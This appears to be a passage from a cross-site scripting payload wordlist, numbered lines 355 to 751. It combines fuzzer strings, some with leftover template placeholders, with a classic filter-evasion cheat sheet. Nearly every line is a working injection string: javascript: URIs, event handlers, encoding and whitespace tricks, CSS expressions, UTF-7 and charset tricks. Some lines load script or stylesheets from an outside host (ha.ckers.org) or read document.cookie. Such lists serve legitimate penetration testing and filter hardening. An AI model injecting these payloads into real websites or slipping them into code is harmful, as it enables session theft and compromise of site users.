  355. <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  356. <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  357. <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  358. <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  359. <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  360. <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  361. <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  362. <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  363. <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  364. <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  365. <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  366. <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  367. <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  368. <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  369. <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  370. <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  371. <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  372. <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  373. <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  374. <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  375. <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  376. <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  377. <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  378. <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  379. <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  380. <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  381. <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  382. <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  383. <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  384. <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  385. <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  386. <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  387. <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  388. <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  389. <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  390. <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  391. <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  392. <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  393. <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  394. <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  395. <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  396. <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  397. <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  398. <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  399. <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  400. <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  401. <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
  402. <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
  403. <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
  404. <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
  405. <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
  406. `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
  407. `"'><img src=xxx:x \x22onerror=javascript:alert(1)>
  408. `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
  409. `"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
  410. `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
  411. `"'><img src=xxx:x \x09onerror=javascript:alert(1)>
  412. `"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
  413. `"'><img src=xxx:x \x00onerror=javascript:alert(1)>
  414. `"'><img src=xxx:x \x27onerror=javascript:alert(1)>
  415. `"'><img src=xxx:x \x20onerror=javascript:alert(1)>
  416. "`'><script>\x3Bjavascript:alert(1)</script>
  417. "`'><script>\x0Djavascript:alert(1)</script>
  418. "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
  419. "`'><script>\xE2\x80\x81javascript:alert(1)</script>
  420. "`'><script>\xE2\x80\x84javascript:alert(1)</script>
  421. "`'><script>\xE3\x80\x80javascript:alert(1)</script>
  422. "`'><script>\x09javascript:alert(1)</script>
  423. "`'><script>\xE2\x80\x89javascript:alert(1)</script>
  424. "`'><script>\xE2\x80\x85javascript:alert(1)</script>
  425. "`'><script>\xE2\x80\x88javascript:alert(1)</script>
  426. "`'><script>\x00javascript:alert(1)</script>
  427. "`'><script>\xE2\x80\xA8javascript:alert(1)</script>
  428. "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
  429. "`'><script>\xE1\x9A\x80javascript:alert(1)</script>
  430. "`'><script>\x0Cjavascript:alert(1)</script>
  431. "`'><script>\x2Bjavascript:alert(1)</script>
  432. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
  433. "`'><script>-javascript:alert(1)</script>
  434. "`'><script>\x0Ajavascript:alert(1)</script>
  435. "`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
  436. "`'><script>\x7Ejavascript:alert(1)</script>
  437. "`'><script>\xE2\x80\x87javascript:alert(1)</script>
  438. "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
  439. "`'><script>\xE2\x80\xA9javascript:alert(1)</script>
  440. "`'><script>\xC2\x85javascript:alert(1)</script>
  441. "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
  442. "`'><script>\xE2\x80\x83javascript:alert(1)</script>
  443. "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
  444. "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
  445. "`'><script>\xE2\x80\x80javascript:alert(1)</script>
  446. "`'><script>\x21javascript:alert(1)</script>
  447. "`'><script>\xE2\x80\x82javascript:alert(1)</script>
  448. "`'><script>\xE2\x80\x86javascript:alert(1)</script>
  449. "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
  450. "`'><script>\x0Bjavascript:alert(1)</script>
  451. "`'><script>\x20javascript:alert(1)</script>
  452. "`'><script>\xC2\xA0javascript:alert(1)</script>
  453. "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
  454. "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
  455. "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
  456. "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
  457. "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
  458. "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
  459. "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
  460. "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
  461. "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
  462. <script\x2F>javascript:alert(1)</script>
  463. <script\x20>javascript:alert(1)</script>
  464. <script\x0D>javascript:alert(1)</script>
  465. <script\x0A>javascript:alert(1)</script>
  466. <script\x0C>javascript:alert(1)</script>
  467. <script\x00>javascript:alert(1)</script>
  468. <script\x09>javascript:alert(1)</script>
  469. "><img src=x onerror=javascript:alert(1)>
  470. "><img src=x onerror=javascript:alert('1')>
  471. "><img src=x onerror=javascript:alert("1")>
  472. "><img src=x onerror=javascript:alert(`1`)>
  473. "><img src=x onerror=javascript:alert(('1'))>
  474. "><img src=x onerror=javascript:alert(("1"))>
  475. "><img src=x onerror=javascript:alert((`1`))>
  476. "><img src=x onerror=javascript:alert(A)>
  477. "><img src=x onerror=javascript:alert((A))>
  478. "><img src=x onerror=javascript:alert(('A'))>
  479. "><img src=x onerror=javascript:alert('A')>
  480. "><img src=x onerror=javascript:alert(("A"))>
  481. "><img src=x onerror=javascript:alert("A")>
  482. "><img src=x onerror=javascript:alert((`A`))>
  483. "><img src=x onerror=javascript:alert(`A`)>
  484. `"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
  485. `"'><img src=xxx:x onerror\x00=javascript:alert(1)>
  486. `"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
  487. `"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
  488. `"'><img src=xxx:x onerror\x20=javascript:alert(1)>
  489. `"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
  490. `"'><img src=xxx:x onerror\x09=javascript:alert(1)>
  491. <script>javascript:alert(1)<\x00/script>
  492. <img src=# onerror\x3D"javascript:alert(1)" >
  493. <input onfocus=javascript:alert(1) autofocus>
  494. <input onblur=javascript:alert(1) autofocus><input autofocus>
  495. <video poster=javascript:javascript:alert(1)//
  496. <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  497. <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
  498. <video><source onerror="javascript:javascript:alert(1)">
  499. <video onerror="javascript:javascript:alert(1)"><source>
  500. <form><button formaction="javascript:javascript:alert(1)">X
  501. <body oninput=javascript:alert(1)><input autofocus>
  502. <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
  503. <frameset onload=javascript:alert(1)>
  504. <table background="javascript:javascript:alert(1)">
  505. <!--<img src="--><img src=x onerror=javascript:alert(1)//">
  506. <comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
  507. <![><img src="]><img src=x onerror=javascript:alert(1)//">
  508. <style><img src="</style><img src=x onerror=javascript:alert(1)//">
  509. <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
  510. <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
  511. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
  512. <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
  513. <object data="data:text/html;base64,%(base64)s">
  514. <embed src="data:text/html;base64,%(base64)s">
  515. <b <script>alert(1)</script>0
  516. <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  517. <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
  518. <embed src="javascript:alert(1)">
  519. <img src="javascript:alert(1)">
  520. <image src="javascript:alert(1)">
  521. <script src="javascript:alert(1)">
  522. <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
  523. <? foo="><script>javascript:alert(1)</script>">
  524. <! foo="><script>javascript:alert(1)</script>">
  525. </ foo="><script>javascript:alert(1)</script>">
  526. <? foo="><x foo='?><script>javascript:alert(1)</script>'>">
  527. <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
  528. <% foo><x foo="%><script>javascript:alert(1)</script>">
  529. <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
  530. <img \x00src=x onerror="alert(1)">
  531. <img \x47src=x onerror="javascript:alert(1)">
  532. <img \x11src=x onerror="javascript:alert(1)">
  533. <img \x12src=x onerror="javascript:alert(1)">
  534. <img\x47src=x onerror="javascript:alert(1)">
  535. <img\x10src=x onerror="javascript:alert(1)">
  536. <img\x13src=x onerror="javascript:alert(1)">
  537. <img\x32src=x onerror="javascript:alert(1)">
  538. <img\x47src=x onerror="javascript:alert(1)">
  539. <img\x11src=x onerror="javascript:alert(1)">
  540. <img \x47src=x onerror="javascript:alert(1)">
  541. <img \x34src=x onerror="javascript:alert(1)">
  542. <img \x39src=x onerror="javascript:alert(1)">
  543. <img \x00src=x onerror="javascript:alert(1)">
  544. <img src\x09=x onerror="javascript:alert(1)">
  545. <img src\x10=x onerror="javascript:alert(1)">
  546. <img src\x13=x onerror="javascript:alert(1)">
  547. <img src\x32=x onerror="javascript:alert(1)">
  548. <img src\x12=x onerror="javascript:alert(1)">
  549. <img src\x11=x onerror="javascript:alert(1)">
  550. <img src\x00=x onerror="javascript:alert(1)">
  551. <img src\x47=x onerror="javascript:alert(1)">
  552. <img src=x\x09onerror="javascript:alert(1)">
  553. <img src=x\x10onerror="javascript:alert(1)">
  554. <img src=x\x11onerror="javascript:alert(1)">
  555. <img src=x\x12onerror="javascript:alert(1)">
  556. <img src=x\x13onerror="javascript:alert(1)">
  557. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
  558. <img src=x onerror=\x09"javascript:alert(1)">
  559. <img src=x onerror=\x10"javascript:alert(1)">
  560. <img src=x onerror=\x11"javascript:alert(1)">
  561. <img src=x onerror=\x12"javascript:alert(1)">
  562. <img src=x onerror=\x32"javascript:alert(1)">
  563. <img src=x onerror=\x00"javascript:alert(1)">
  564. <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
  565. <img src="x` `<script>javascript:alert(1)</script>"` `>
  566. <img src onerror /" '"= alt=javascript:alert(1)//">
  567. <title onpropertychange=javascript:alert(1)></title><title title=>
  568. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
  569. <!--[if]><script>javascript:alert(1)</script -->
  570. <!--[if<img src=x onerror=javascript:alert(1)//]> -->
  571. <script src="/\%(jscript)s"></script>
  572. <script src="\\%(jscript)s"></script>
  573. <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
  574. <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
  575. <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
  576. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
  577. <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
  578. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
  579. <style>*[{}@import'%(css)s?]</style>X
  580. <div style="font-family:'foo&#10;;color:red;';">XXX
  581. <div style="font-family:foo}color=red;">XXX
  582. <// style=x:expression\28javascript:alert(1)\29>
  583. <style>*{x:expression(javascript:alert(1))}</style>
  584. <div style=content:url(%(svg)s)></div>
  585. <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
  586. <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
  587. <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
  588. <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  589. <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
  590. <x style="background:url('x&#1;;color:red;/*')">XXX</x>
  591. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
  592. <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
  593. <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
  594. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
  595. <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
  596. <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
  597. <meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
  598. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
  599. 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
  600. 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
  601. <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
  602. 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
  603. <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
  604. <x style="behavior:url(%(sct)s)">
  605. <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
  606. <event-source src="%(event)s" onload="javascript:alert(1)">
  607. <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
  608. <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
  609. <script>%(payload)s</script>
  610. <script src=%(jscript)s></script>
  611. <script language='javascript' src='%(jscript)s'></script>
  612. <script>javascript:alert(1)</script>
  613. <IMG SRC="javascript:javascript:alert(1);">
  614. <IMG SRC=javascript:javascript:alert(1)>
  615. <IMG SRC=`javascript:javascript:alert(1)`>
  616. <SCRIPT SRC=%(jscript)s?<B>
  617. <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
  618. <BODY ONLOAD=javascript:alert(1)>
  619. <BODY ONLOAD=javascript:javascript:alert(1)>
  620. <IMG SRC="jav ascript:javascript:alert(1);">
  621. <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
  622. <SCRIPT/SRC="%(jscript)s"></SCRIPT>
  623. <<SCRIPT>%(payload)s//<</SCRIPT>
  624. <IMG SRC="javascript:javascript:alert(1)"
  625. <iframe src=%(scriptlet)s <
  626. <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
  627. <IMG DYNSRC="javascript:javascript:alert(1)">
  628. <IMG LOWSRC="javascript:javascript:alert(1)">
  629. <BGSOUND SRC="javascript:javascript:alert(1);">
  630. <BR SIZE="&{javascript:alert(1)}">
  631. <LAYER SRC="%(scriptlet)s"></LAYER>
  632. <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
  633. <STYLE>@import'%(css)s';</STYLE>
  634. <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
  635. <XSS STYLE="behavior: url(%(htc)s);">
  636. <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
  637. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
  638. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
  639. <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
  640. <TABLE BACKGROUND="javascript:javascript:alert(1)">
  641. <TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
  642. <DIV STYLE="background-image: url(javascript:javascript:alert(1))">
  643. <DIV STYLE="width:expression(javascript:alert(1));">
  644. <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
  645. <XSS STYLE="xss:expression(javascript:alert(1))">
  646. <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
  647. <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
  648. <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
  649. <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
  650. <BASE HREF="javascript:javascript:alert(1);//">
  651. <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
  652. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
  653. <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  654. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>
  655. <SCRIPT SRC="%(jpg)s"></SCRIPT>
  656. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
  657. <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
  658. <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  659. <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
  660. <STYLE>@import'%(css)s';</STYLE>
  661. <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
  662. <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
  663. <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
  664. <style onreadystatechange=javascript:javascript:alert(1);></style>
  665. <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
  666. <embed code=%(scriptlet)s></embed>
  667. <embed code=javascript:javascript:alert(1);></embed>
  668. <embed src=%(jscript)s></embed>
  669. <frameset onload=javascript:javascript:alert(1)></frameset>
  670. <object onerror=javascript:javascript:alert(1)>
  671. <embed type="image" src=%(scriptlet)s></embed>
  672. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
  673. <IMG SRC=&{javascript:alert(1);};>
  674. <a href="jav&#65ascript:javascript:alert(1)">test1</a>
  675. <a href="jav&#97ascript:javascript:alert(1)">test1</a>
  676. <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
  677. <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
  678. ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
  679. alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
  680. ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  681. '';!--"<XSS>=&{()}
  682. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  683. <IMG SRC="javascript:alert('XSS');">
  684. <IMG SRC=javascript:alert('XSS')>
  685. <IMG SRC=JaVaScRiPt:alert('XSS')>
  686. <IMG SRC=javascript:alert("XSS")>
  687. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
  688. <a onmouseover="alert(document.cookie)">xxs link</a>
  689. <a onmouseover=alert(document.cookie)>xxs link</a>
  690. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  691. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  692. <IMG SRC=# onmouseover="alert('xxs')">
  693. <IMG SRC= onmouseover="alert('xxs')">
  694. <IMG onmouseover="alert('xxs')">
  695. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  696. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  697. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  698. <IMG SRC="jav ascript:alert('XSS');">
  699. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  700. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
  701. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
  702. perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
  703. <IMG SRC=" &#14; javascript:alert('XSS');">
  704. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  705. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  706. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  707. <<SCRIPT>alert("XSS");//<</SCRIPT>
  708. <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
  709. <SCRIPT SRC=//ha.ckers.org/.j>
  710. <IMG SRC="javascript:alert('XSS')"
  711. <iframe src=http://ha.ckers.org/scriptlet.html <
  712. \";alert('XSS');//
  713. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  714. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  715. <BODY BACKGROUND="javascript:alert('XSS')">
  716. <IMG DYNSRC="javascript:alert('XSS')">
  717. <IMG LOWSRC="javascript:alert('XSS')">
  718. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
  719. <IMG SRC='vbscript:msgbox("XSS")'>
  720. <IMG SRC="livescript:[code]">
  721. <BODY ONLOAD=alert('XSS')>
  722. <BGSOUND SRC="javascript:alert('XSS');">
  723. <BR SIZE="&{alert('XSS')}">
  724. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  725. <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
  726. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
  727. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
  728. <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
  729. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  730. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  731. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
  732. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  733. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  734. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  735. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  736. <XSS STYLE="xss:expression(alert('XSS'))">
  737. <XSS STYLE="behavior: url(xss.htc);">
  738. ¼script¾alert(¢XSS¢)¼/script¾
  739. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  740. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  741. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  742. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  743. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  744. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  745. <TABLE BACKGROUND="javascript:alert('XSS')">
  746. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  747. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  748. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  749. <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
  750. <DIV STYLE="width: expression(alert('XSS'));">
  751. <BASE HREF="javascript:alert('XSS');//">
